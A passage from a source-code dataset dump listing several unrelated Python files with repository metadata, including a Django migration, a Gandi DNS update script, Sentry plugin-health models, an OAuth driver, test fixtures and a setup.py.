] | null | null | null | radioepg/migrations/0001_initial.py | mervij/radiodns | 01543cf1e4de8de335af0301616e089c35fc67f8 | [
"Apache-2.0"
] | 8 | 2021-05-17T10:54:28.000Z | 2021-06-08T12:02:37.000Z | radioepg/migrations/0001_initial.py | mervij/radiodns | 01543cf1e4de8de335af0301616e089c35fc67f8 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.6 on 2021-02-15 08:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema: creates the Service and Bearer models;
    a Bearer references its Service via a CASCADE foreign key."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Service',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('short_name', models.CharField(max_length=8)),
                ('medium_name', models.CharField(max_length=16)),
            ],
        ),
        migrations.CreateModel(
            name='Bearer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bearer_id', models.TextField()),
                ('cost', models.IntegerField()),
                ('mimeValue', models.CharField(max_length=255)),
                ('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='radioepg.service')),
            ],
        ),
    ]
| 32.117647 | 115 | 0.571429 | 109 | 1,092 | 5.605505 | 0.504587 | 0.03928 | 0.08838 | 0.11784 | 0.350246 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0 | 0.027167 | 0.292125 | 1,092 | 33 | 116 | 33.090909 | 0.76326 | 0.041209 | 0 | 0.384615 | 1 | 0 | 0.083254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3b45e5164e572fbde2110d62cb448013353f1cd | 1,593 | py | Python | gandyndns.py | nim65s/scripts | 2c61bd77bfca6ae6437654e43ad2bc95d611360a | [
"BSD-2-Clause"
] | 1 | 2020-12-17T09:41:42.000Z | 2020-12-17T09:41:42.000Z | gandyndns.py | nim65s/scripts | 2c61bd77bfca6ae6437654e43ad2bc95d611360a | [
"BSD-2-Clause"
] | null | null | null | gandyndns.py | nim65s/scripts | 2c61bd77bfca6ae6437654e43ad2bc95d611360a | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
'''update gandi DNS domain entry, with LiveDNS v5
Cf. https://doc.livedns.gandi.net/#work-with-domains
'''
import argparse
import ipaddress
import json
import os
from subprocess import check_output
import requests
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('domain')
parser.add_argument('name')
parser.add_argument('--ip', help="defaults to ifconfig.me's return")
parser.add_argument('--api_key', help="defaults to GANDI_API_KEY env var, or the return of 'pass api/gandi'")
args = parser.parse_args()

# Resolve the public IP when not supplied; the curl User-Agent makes
# ifconfig.me answer with the bare address rather than an HTML page.
if args.ip is None:
    args.ip = requests.get('http://ifconfig.me', headers={'User-Agent': 'curl/7.61.1'}).content.decode().strip()
# Validates the address and distinguishes IPv4 from IPv6 (used to pick
# the record type below).
ip = ipaddress.ip_address(args.ip)

# API-key precedence: --api_key flag, then GANDI_API_KEY, then `pass`.
# Fixed: the previous os.environ.get('GANDI_API_KEY', check_output(...))
# evaluated the `pass` subprocess eagerly even when the env var was set
# (Python evaluates default arguments before the call); the fallback is
# now only executed when actually needed.
if args.api_key is None:
    args.api_key = os.environ.get('GANDI_API_KEY')
    if args.api_key is None:
        args.api_key = check_output(['pass', 'api/gandi'], text=True).strip()
key = {'X-Api-Key': args.api_key}

r = requests.get(f'https://dns.api.gandi.net/api/v5/domains/{args.domain}/records/{args.name}', headers=key)
r.raise_for_status()

# NOTE(review): assumes the record already exists — r.json()[0] would raise
# IndexError for an unknown name; confirm against the LiveDNS response.
if r.json()[0]['rrset_values'][0] == args.ip:
    if args.verbose:
        print('ok')
else:
    # Record differs: overwrite it with an A or AAAA rrset as appropriate.
    type_ = 'AAAA' if isinstance(ip, ipaddress.IPv6Address) else 'A'
    url = f'https://dns.api.gandi.net/api/v5/domains/{args.domain}/records/{args.name}/{type_}'
    data = {'rrset_values': [args.ip]}
    headers = {'Content-Type': 'application/json', **key}
    r = requests.put(url, data=json.dumps(data), headers=headers)
    if args.verbose:
        print(r.json())
    else:
        r.raise_for_status()
| 32.510204 | 112 | 0.696171 | 245 | 1,593 | 4.404082 | 0.395918 | 0.038925 | 0.078777 | 0.022243 | 0.105653 | 0.105653 | 0.105653 | 0.105653 | 0.105653 | 0.105653 | 0 | 0.007168 | 0.124294 | 1,593 | 48 | 113 | 33.1875 | 0.766308 | 0.07533 | 0 | 0.176471 | 0 | 0.058824 | 0.295362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.058824 | 0.176471 | 0 | 0.176471 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3b4eac02574fc5ff2fd374b340d31cb4dba25c1 | 3,750 | py | Python | src/sentry/models/pluginhealth.py | ayesha-omarali/sentry | 96f81a1805227c26234e6317771bc0dcb5c176ad | [
"BSD-3-Clause"
] | null | null | null | src/sentry/models/pluginhealth.py | ayesha-omarali/sentry | 96f81a1805227c26234e6317771bc0dcb5c176ad | [
"BSD-3-Clause"
] | null | null | null | src/sentry/models/pluginhealth.py | ayesha-omarali/sentry | 96f81a1805227c26234e6317771bc0dcb5c176ad | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from sentry.db.models import (
ArrayField, BoundedPositiveIntegerField, Model, FlexibleForeignKey, sane_repr
)
from django.db import models
from jsonfield import JSONField
from django.utils import timezone
from sentry.constants import ObjectStatus
from django.utils.translation import ugettext_lazy as _
class PluginFeatures(object):
    """String constants naming the features a plugin may support; checked
    against PluginHealth.features_list by the health tests below."""
    issue_basic = 'issue_basic'
    issue_sync = 'issue_sync'
    repository = 'repository'
class PluginHealth(Model):
    """Health record for a plugin: identity, supported features, status,
    and an entry point to run the health-test suite."""
    __core__ = True

    name = models.CharField(max_length=128, db_index=True)
    # Feature identifiers; PluginHealthTest checks PluginFeatures values
    # against this list.
    features_list = ArrayField(of=models.TextField)
    date_added = models.DateTimeField(default=timezone.now)
    link = models.URLField(null=True, blank=True)
    author = models.CharField(max_length=64)
    metadata = JSONField()
    # Lifecycle status; VISIBLE (0) is the default "active" state.
    status = BoundedPositiveIntegerField(
        default=0,
        choices=(
            (ObjectStatus.VISIBLE,
             _('Active')), (ObjectStatus.PENDING_DELETION, _('Pending Deletion')),
            (ObjectStatus.DELETION_IN_PROGRESS, _('Deletion in Progress')),
        ),
        db_index=True
    )

    class Meta:
        app_label = 'sentry'
        db_table = 'sentry_pluginhealth'

    __repr__ = sane_repr('name')

    def run_tests(self):
        """Create a PluginHealthTest row for this plugin, run its test
        suite, persist the results, and return the test object."""
        plugin_test = PluginHealthTest.objects.create(
            plugin_id=self.id,
        )
        plugin_test.test_data = plugin_test.run_tests(self)
        plugin_test.save()
        return plugin_test
class PluginHealthTest(Model):
    """One health-test run for a plugin; per-check results are stored as
    JSON in test_data. Each check method currently returns None — they are
    placeholders gated on the plugin's advertised features."""
    __core__ = True

    date_added = models.DateTimeField(default=timezone.now)
    plugin = FlexibleForeignKey('sentry.PluginHealth')
    test_data = JSONField()

    class Meta:
        app_label = 'sentry'
        db_table = 'sentry_pluginhealthtest'
        unique_together = (('plugin', 'date_added'))

    __repr__ = sane_repr('plugin', 'date_added')

    def run_tests(self, plugin_health):
        """Run every check and collect the per-check results in one dict."""
        return {
            'configure_test': self.configure_test(plugin_health),
            'create_issue_test': self.create_issue_test(plugin_health),
            'link_issue_test': self.link_issue_test(plugin_health),
            'sync_assignment_test': self.sync_assignment_test(plugin_health),
            'sync_comment_test': self.sync_comment_test(plugin_health),
            'sync_status_test': self.sync_status_test(plugin_health),
            'repository_test': self.repository_test(plugin_health),
        }

    def configure_test(self, plugin_health):
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results

    def create_issue_test(self, plugin_health):
        # Skip when the plugin does not advertise basic issue support.
        if PluginFeatures.issue_basic not in plugin_health.features_list:
            return None
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results

    def link_issue_test(self, plugin_health):
        # Skip when the plugin does not advertise basic issue support.
        if PluginFeatures.issue_basic not in plugin_health.features_list:
            return None
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results

    def sync_assignment_test(self, plugin_health):
        # Skip when the plugin does not advertise issue-sync support.
        if PluginFeatures.issue_sync not in plugin_health.features_list:
            return None
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results

    def sync_comment_test(self, plugin_health):
        # Skip when the plugin does not advertise issue-sync support.
        if PluginFeatures.issue_sync not in plugin_health.features_list:
            return None
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results

    def sync_status_test(self, plugin_health):
        # Skip when the plugin does not advertise issue-sync support.
        if PluginFeatures.issue_sync not in plugin_health.features_list:
            return None
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results

    def repository_test(self, plugin_health):
        # Skip when the plugin does not advertise repository support.
        if PluginFeatures.repository not in plugin_health.features_list:
            return None
        # Placeholder: no real check implemented yet; always returns None.
        test_results = None
        return test_results
| 32.327586 | 82 | 0.686133 | 427 | 3,750 | 5.686183 | 0.213115 | 0.103789 | 0.052718 | 0.057661 | 0.408979 | 0.380972 | 0.366145 | 0.313839 | 0.284185 | 0.284185 | 0 | 0.002102 | 0.238667 | 3,750 | 115 | 83 | 32.608696 | 0.848336 | 0 | 0 | 0.351064 | 0 | 0 | 0.078933 | 0.006133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095745 | false | 0 | 0.074468 | 0.010638 | 0.56383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3b76c1c0fc989bb41ad8f58fabce2395587d211 | 1,615 | py | Python | src/masonite/oauth/drivers/FacebookDriver.py | girardinsamuel/masonite-socialite | 04110601b299d8505ec453b7743124cb88047d9d | [
"MIT"
] | 1 | 2021-05-07T16:37:03.000Z | 2021-05-07T16:37:03.000Z | src/masonite/oauth/drivers/FacebookDriver.py | girardinsamuel/masonite-socialite | 04110601b299d8505ec453b7743124cb88047d9d | [
"MIT"
] | 11 | 2021-05-17T06:45:48.000Z | 2021-10-03T15:16:23.000Z | src/masonite/oauth/drivers/FacebookDriver.py | girardinsamuel/masonite-socialite | 04110601b299d8505ec453b7743124cb88047d9d | [
"MIT"
] | null | null | null | from .BaseDriver import BaseDriver
from ..OAuthUser import OAuthUser
class FacebookDriver(BaseDriver):
def get_default_scopes(self):
return ["email"]
def get_auth_url(self):
return "https://www.facebook.com/dialog/oauth"
def get_token_url(self):
return "https://graph.facebook.com/oauth/access_token"
def get_user_url(self):
return "https://graph.facebook.com/me?"
def get_request_options(self, token):
return {
"headers": {"Authorization": f"Bearer {token}", "Accept": "application/json"},
"query": {"prettyPrint": "false"},
}
def user(self):
user_data, token = super().user()
user = (
OAuthUser()
.set_token(token)
.build(
{
"id": user_data["sub"],
"nickname": user_data["nickname"],
"name": user_data["name"],
"email": user_data["email"],
"avatar": user_data["picture"],
}
)
)
return user
def user_from_token(self, token):
user_data = super().user_from_token(token)
user = (
OAuthUser()
.set_token(token)
.build(
{
"id": user_data["sub"],
"nickname": user_data["nickname"],
"name": user_data["name"],
"email": user_data["email"],
"avatar": user_data["picture"],
}
)
)
return user
| 28.333333 | 90 | 0.479257 | 149 | 1,615 | 5 | 0.322148 | 0.128859 | 0.052349 | 0.072483 | 0.448322 | 0.448322 | 0.448322 | 0.357047 | 0.357047 | 0.357047 | 0 | 0 | 0.389474 | 1,615 | 56 | 91 | 28.839286 | 0.755578 | 0 | 0 | 0.416667 | 0 | 0 | 0.18452 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.041667 | 0.104167 | 0.354167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
d3ba25fae7aacb5e43b639c41eadbd3d14fb7a48 | 303 | py | Python | ms_deisotope/qc/__init__.py | mstim/ms_deisotope | 29f4f466e92e66b65a2d21eca714aa627caa21db | [
"Apache-2.0"
] | 18 | 2017-09-01T12:26:12.000Z | 2022-02-23T02:31:29.000Z | ms_deisotope/qc/__init__.py | mstim/ms_deisotope | 29f4f466e92e66b65a2d21eca714aa627caa21db | [
"Apache-2.0"
] | 19 | 2017-03-12T20:40:36.000Z | 2022-03-31T22:50:47.000Z | ms_deisotope/qc/__init__.py | mstim/ms_deisotope | 29f4f466e92e66b65a2d21eca714aa627caa21db | [
"Apache-2.0"
] | 14 | 2016-05-06T02:25:30.000Z | 2022-03-31T14:40:06.000Z | """A collection of methods for determining whether a given spectrum is
of high quality (likely to produce a high quality interpretation)
"""
from .heuristic import xrea
from .isolation import CoIsolation, PrecursorPurityEstimator
__all__ = [
"xrea",
"CoIsolation", "PrecursorPurityEstimator"
]
| 27.545455 | 70 | 0.772277 | 34 | 303 | 6.764706 | 0.705882 | 0.095652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155116 | 303 | 10 | 71 | 30.3 | 0.898438 | 0.438944 | 0 | 0 | 0 | 0 | 0.239264 | 0.147239 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
d3bbc84b4a938b83b84adeff2d313509849c11f6 | 3,855 | py | Python | rpi_animations/message.py | Anski-D/rpi_animations_old | b019a301ba777d76e3cedc6b86359570e2c2f18b | [
"MIT"
] | null | null | null | rpi_animations/message.py | Anski-D/rpi_animations_old | b019a301ba777d76e3cedc6b86359570e2c2f18b | [
"MIT"
] | null | null | null | rpi_animations/message.py | Anski-D/rpi_animations_old | b019a301ba777d76e3cedc6b86359570e2c2f18b | [
"MIT"
] | null | null | null | from .item import Item
class Message(Item):
"""
Message feature object in the rpi_animations package.
"""
def __init__(self, group, screen_animator) -> None:
"""
Initialise Message object with sprite group and screen object. Run initial setup methods.
Args:
group (Group): Pygame sprite group to which the object will be added.
screen_animator (ScreenAnimator): Main package object controlling the animation.
"""
super().__init__(group, screen_animator)
# Store x position as float
self._x = float(self._rect.x)
# Set the flag that the message hasn't fully emerged
self._has_fully_emerged = False
def _setup_item(self) -> None:
"""
Run methods to setup the object.
Returns:
None
"""
self._set_text()
# Run parent method
super()._setup_item()
def _set_text(self) -> None:
"""
Set font, message text, and outline of text.
Returns:
None
"""
# Set font
self._font = self._settings.font
# Set the message text
self._text = self._settings.text
# Set the outline text
self._outline_text = self._font.render(
self._text,
self._settings.settings['text_aa'],
self._settings.outline_colour
)
def _set_item_content(self) -> None:
"""
Render the message text.
Returns:
None
"""
self.content = self._font.render(
self._text,
self._settings.settings['text_aa'],
self._settings.text_colour
)
def _place_item(self) -> None:
"""
Set the initial object position on the screen.
Returns:
None
"""
self._rect.midleft = self._screen_rect.midright
def _draw_outline(self) -> None:
"""
Draw the message text outline.
Returns:
None
"""
outline_width = self._settings.settings['outline_width']
self._screen.blit(self._outline_text, (self._rect.x - outline_width, self._rect.y - outline_width))
self._screen.blit(self._outline_text, (self._rect.x - outline_width, self._rect.y + outline_width))
self._screen.blit(self._outline_text, (self._rect.x + outline_width, self._rect.y - outline_width))
self._screen.blit(self._outline_text, (self._rect.x + outline_width, self._rect.y + outline_width))
def blit(self) -> None:
"""
Add the object to the pygame screen.
Returns:
None
"""
# Draw outline text
self._draw_outline()
# Draw the message
self._set_item_content()
# Run parent method
super().blit()
def update(self) -> None:
"""
Move the object position to the left during a frame update.
Returns:
None
"""
self._x -= self._settings.settings['text_speed'] / self._settings.settings['fps']
self._rect.x = self._x
def is_on_screen(self) -> bool:
"""
Determine whether the object is still on the screen.
Returns:
bool: True if still on screen, False otherwise.
"""
if self._rect.right <= self._screen_rect.left:
return False
return True
def has_just_emerged(self) -> bool:
"""
Determine whether the right side of the message is now visible on the screen.
Returns:
bool: True if right edge is now on screen, False otherwise.
"""
if not self._has_fully_emerged and self._rect.right <= self._screen_rect.right:
self._has_fully_emerged = True
return True
return False
| 27.147887 | 107 | 0.575357 | 450 | 3,855 | 4.682222 | 0.22 | 0.049359 | 0.068344 | 0.045088 | 0.298054 | 0.249644 | 0.224015 | 0.197437 | 0.197437 | 0.197437 | 0 | 0 | 0.332815 | 3,855 | 141 | 108 | 27.340426 | 0.819207 | 0.307912 | 0 | 0.170213 | 0 | 0 | 0.017809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212766 | false | 0 | 0.021277 | 0 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3bea2de7d4525c6881fb3abdb31815d971e7131 | 506 | py | Python | tests/conftest.py | Beanxx/alonememo | aa90bcca6a5dcaa41305b162ac5d6dbe8d0d2562 | [
"MIT"
] | null | null | null | tests/conftest.py | Beanxx/alonememo | aa90bcca6a5dcaa41305b162ac5d6dbe8d0d2562 | [
"MIT"
] | null | null | null | tests/conftest.py | Beanxx/alonememo | aa90bcca6a5dcaa41305b162ac5d6dbe8d0d2562 | [
"MIT"
] | null | null | null | import pytest
from pymongo import MongoClient
import app as flask_app
test_database_name = 'spartatest'
client = MongoClient('localhost', 27017)
db = client.get_database(test_database_name)
@pytest.fixture
def app():
test_app = flask_app.create_app(test_database_name)
# 제네레이터 문법(yield 구문까지만 실행하고 대기,
# 이후 다시 호출할 때 yield 구문 다음이 진행됨)
# app이 종료되는 것이 아니라 stop됨.
yield test_app
# 여기서부터는 모든 테스트가 완료되고 나서 시행됨
client.drop_database(test_database_name)
print('테스트 DB 제거 완료')
| 20.24 | 55 | 0.727273 | 78 | 506 | 4.525641 | 0.628205 | 0.135977 | 0.181303 | 0.107649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012346 | 0.199605 | 506 | 24 | 56 | 21.083333 | 0.859259 | 0.217391 | 0 | 0 | 0 | 0 | 0.079487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.25 | 0 | 0.333333 | 0.083333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3c0c248eab748f6973cc1f7d32930648b9e6320 | 1,825 | py | Python | challenges/challenge.py | Tech-With-Tim/models | 221fce614776df01b151e73071c788c3ce57dc52 | [
"MIT"
] | 2 | 2021-07-09T18:53:15.000Z | 2021-08-06T06:21:14.000Z | challenges/challenge.py | Tech-With-Tim/models | 221fce614776df01b151e73071c788c3ce57dc52 | [
"MIT"
] | 8 | 2021-07-09T13:08:07.000Z | 2021-09-12T20:25:08.000Z | challenges/challenge.py | Tech-With-Tim/models | 221fce614776df01b151e73071c788c3ce57dc52 | [
"MIT"
] | 4 | 2021-07-09T12:32:20.000Z | 2021-07-29T15:19:25.000Z | from postDB import Model, Column, types
from datetime import datetime
import utils
class Challenge(Model):
"""
Challenge class to store the challenge details
Database Attributes:
Attributes stored in the `challenges` table.
:param int id: The challenge Snowflake ID.
:param str title: The challenge title.
:param int author_id: The challenge author's Discord ID.
:param str description: A description.
:param List[str] example_in: Example input.
:param List[str] example_out: Example output.
:param List[int] language_ids: The languages you can use to complete this challenge.
:param :class:`datetime` released_at: The time this challenge was released at.
:param bool deleted: Whether or not this challenge has been deleted.
:param str slug: The URL slug this challenge relates to.
"""
id = Column(types.Integer(big=True), primary_key=True)
title = Column(types.String, unique=True)
author_id = Column(
types.ForeignKey("users", "id", sql_type=types.Integer(big=True)),
)
description = Column(types.String)
example_in = Column(types.Array(types.String))
example_out = Column(types.Array(types.String))
# Implicit ForeignKey to ChallengeLanguage.id
language_ids = Column(types.Array(types.Integer(big=True)))
released_at = Column(types.DateTime, nullable=True)
deleted = Column(types.Boolean, default=False)
slug = Column(types.String, unique=True)
@property
def created_at(self) -> datetime:
"""Returns the time the challenge was created"""
return utils.snowflake_time(self.id)
| 40.555556 | 101 | 0.633973 | 217 | 1,825 | 5.267281 | 0.37788 | 0.105862 | 0.03937 | 0.049869 | 0.094488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.282192 | 1,825 | 44 | 102 | 41.477273 | 0.872519 | 0.525479 | 0 | 0 | 0 | 0 | 0.008783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.157895 | 0 | 0.842105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3c2f371f8e9bd53dfa26410d72fcf0c4b952e00 | 1,004 | py | Python | settings.py | embrace-inpe/cycle-slip-correction | c465dd4d45ea7df63a18749e26ba4bf0aa27eb59 | [
"MIT"
] | 6 | 2019-05-20T21:23:41.000Z | 2021-06-23T15:00:30.000Z | settings.py | embrace-inpe/cycle-slip-correction | c465dd4d45ea7df63a18749e26ba4bf0aa27eb59 | [
"MIT"
] | null | null | null | settings.py | embrace-inpe/cycle-slip-correction | c465dd4d45ea7df63a18749e26ba4bf0aa27eb59 | [
"MIT"
] | 5 | 2018-12-27T16:46:45.000Z | 2020-09-14T13:44:00.000Z | """
Commom settings to all applications
"""
A = 40.3
TECU = 1.0e16
C = 299792458
F1 = 1.57542e9
F2 = 1.22760e9
factor_1 = (F1 - F2) / (F1 + F2) / C
factor_2 = (F1 * F2) / (F2 - F1) / C
DIFF_TEC_MAX = 0.05
LIMIT_STD = 7.5
plot_it = True
REQUIRED_VERSION = 3.01
CONSTELLATIONS = ['G', 'R']
COLUMNS_IN_RINEX = {'3.03': {'G': {'L1': 'L1C', 'L2': 'L2W', 'C1': 'C1C', 'P1': 'C1W', 'P2': 'C2W'},
'R': {'L1': 'L1C', 'L2': 'L2C', 'C1': 'C1C', 'P1': 'C1P', 'P2': 'C2P'}
},
'3.02': {'G': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1W', 'P2': 'C2W'},
'R': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1P', 'P2': 'C2P'}
},
'3.01': {'G': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1W', 'P2': 'C2W'},
'R': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1P', 'P2': 'C2P'}
}
}
| 33.466667 | 100 | 0.351594 | 127 | 1,004 | 2.708661 | 0.433071 | 0.087209 | 0.122093 | 0.093023 | 0.380814 | 0.380814 | 0.380814 | 0.331395 | 0.27907 | 0.27907 | 0 | 0.18859 | 0.371514 | 1,004 | 29 | 101 | 34.62069 | 0.356577 | 0.034861 | 0 | 0.090909 | 0 | 0 | 0.168574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3c3d276986b71cc9d8aae788f2dcd9c3f2eb96a | 1,009 | py | Python | tests/api/test_libcoap_api.py | ggravlingen/ikeatradfri | 9eef5317ab770de874c407449489604b2fdf35f1 | [
"MIT"
] | 726 | 2017-04-12T22:55:39.000Z | 2020-09-02T20:47:13.000Z | tests/api/test_libcoap_api.py | ggravlingen/ikeatradfri | 9eef5317ab770de874c407449489604b2fdf35f1 | [
"MIT"
] | 248 | 2017-04-12T21:45:10.000Z | 2020-09-03T08:48:37.000Z | tests/api/test_libcoap_api.py | ggravlingen/ikeatradfri | 9eef5317ab770de874c407449489604b2fdf35f1 | [
"MIT"
] | 140 | 2017-04-12T20:02:57.000Z | 2020-09-02T08:54:23.000Z | """Test API utilities."""
import json
from pytradfri.api.libcoap_api import APIFactory
from pytradfri.gateway import Gateway
def test_constructor_timeout_passed_to_subprocess(monkeypatch):
"""Test that original timeout is passed to subprocess."""
capture = {}
def capture_args(*args, **kwargs):
capture.update(kwargs)
return json.dumps([])
monkeypatch.setattr("subprocess.check_output", capture_args)
api = APIFactory("anything", timeout=20, psk="abc")
api.request(Gateway().get_devices())
assert capture["timeout"] == 20
def test_custom_timeout_passed_to_subprocess(monkeypatch):
"""Test that custom timeout is passed to subprocess."""
capture = {}
def capture_args(*args, **kwargs):
capture.update(kwargs)
return json.dumps([])
monkeypatch.setattr("subprocess.check_output", capture_args)
api = APIFactory("anything", psk="abc")
api.request(Gateway().get_devices(), timeout=1)
assert capture["timeout"] == 1
| 28.027778 | 64 | 0.698712 | 119 | 1,009 | 5.764706 | 0.327731 | 0.046647 | 0.104956 | 0.072886 | 0.699708 | 0.699708 | 0.699708 | 0.475219 | 0.475219 | 0.475219 | 0 | 0.007186 | 0.172448 | 1,009 | 35 | 65 | 28.828571 | 0.814371 | 0.119921 | 0 | 0.47619 | 0 | 0 | 0.094037 | 0.052752 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.190476 | false | 0.095238 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3c5d75262328f54482b5a9f8b47cfdc49c36760 | 445 | py | Python | setup.py | korymath/JANN | 98468a2e90a6b55ccb15e905ee10a1d1130cf5d8 | [
"MIT"
] | 39 | 2018-09-25T21:40:38.000Z | 2022-01-19T23:26:51.000Z | setup.py | korymath/JANN | 98468a2e90a6b55ccb15e905ee10a1d1130cf5d8 | [
"MIT"
] | 22 | 2018-09-25T21:36:46.000Z | 2021-09-07T16:03:41.000Z | setup.py | korymath/JANN | 98468a2e90a6b55ccb15e905ee10a1d1130cf5d8 | [
"MIT"
] | 9 | 2018-09-26T00:38:35.000Z | 2020-02-27T05:59:03.000Z | from setuptools import setup
from setuptools import find_packages
setup(
name="Jann",
version="4.0.0",
description="Jann is a Nearest Neighbour retrieval-based chatbot.",
author="Kory Mathewson",
author_email="korymath@gmail.com",
license="MIT",
url="https://github.com/korymath/jann",
packages=find_packages(),
setup_requires=[
"pytest-runner"
],
tests_require=[
"pytest"
],
)
| 20.227273 | 71 | 0.647191 | 51 | 445 | 5.54902 | 0.705882 | 0.09894 | 0.141343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008646 | 0.220225 | 445 | 21 | 72 | 21.190476 | 0.806916 | 0 | 0 | 0.111111 | 0 | 0 | 0.331081 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3cb4fc2b23e4f4fb2c765f3d7673f2b43240708 | 19,911 | py | Python | bert_multitask_learning/top.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
